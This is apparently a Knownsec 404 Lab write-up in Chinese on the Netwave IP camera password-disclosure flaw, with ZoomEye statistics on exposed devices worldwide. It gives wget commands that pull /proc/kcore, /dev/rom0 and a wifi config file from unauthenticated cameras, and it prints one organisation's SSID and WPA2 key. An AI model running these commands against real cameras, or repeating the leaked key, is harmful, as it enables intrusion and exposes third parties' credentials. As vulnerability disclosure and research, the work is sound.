Author:MyKings(知道創宇404實驗室)

看到 exploit-db.com 中報了一個《Netwave IP Camera - Password Disclosure》漏洞, 這個漏洞包含了wifi密碼與Web的賬號泄露。

順便使用了 zoomeye 搜索了下全球的這款網絡攝像頭, 發現用這個還挺多的。

1 背景

1.1 漏洞分析

  • wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
  • wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
  • wget -qO- http://[HOST]:[PORT]//dev/rom0
  • wget -qO- http://[HOST]:[PORT]/get_status.cgi

1.1.1 get_status.cgi

會泄露當前網絡攝像頭的一些配置信息:

var sys_ver='21.37.2.47';
var app_ver='0.0.4.19';
var alias='002voam';
var now=1486976881;
var tz=-28800;
var alarm_status=0;
var ddns_status=0;
var ddns_host='';
var oray_type=0;
var upnp_status=0;
var p2p_status=0;
var p2p_local_port=20409;
var msn_status=0;
var wifi_status=0;
var temperature=0.0;
var humidity=0;
var tridro_error='';

1.1.2 /etc/RT2870STA.dat

這里文件就是一個配置文件, 這里可以得到SSIDwifi密碼。

[Default]
SSID=hang yue office
NetworkType=Infra
Channel=0
AuthMode=WPA2PSK
EncrypType=AES
WPAPSK=hangyuewifi

1.1.3 /proc/kcore

內存的map, 可以直接使用wget下載下來(需要注意這里要把wget進程結束才可以登錄)。

2 區域分布

先來看一張使用 ZoomEye 搜索的結果, 可以看到搜索到 315,129 條。

通過篩選分析后 11186 IP中存在包含wifi密碼, 其中覆蓋了111個國家和地區。

這里近分析了中國香港地區的攝像頭:

  • 無wifi密碼962個
  • WEP加密方式728個
  • WPAPSK加密方式9496個

查詢看密碼

密碼類型統計

  • 純數字 1807 個
  • 純字母 1405 個
  • 字母+數字 5585 個
  • 含特殊字符 1001 個

密碼用的最多TOP 10

密碼長度統計

看的出大眾還是使用8位、10位的密碼較多。

附上一張香港分析后的圖, 紅色代表沒有密碼的wifi, 黃色代表WEP加密方式, 藍色代表WPAPSK方式。

這個世界范圍內存在攝像頭密碼泄漏的分布圖。

這張圖示是根據SSID搜索到的一家公司內的IP攝像頭截圖。

3 參考鏈接

  • https://www.seebug.org/vuldb/ssvid-92650
  • https://www.exploit-db.com/exploits/41236/

Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/225/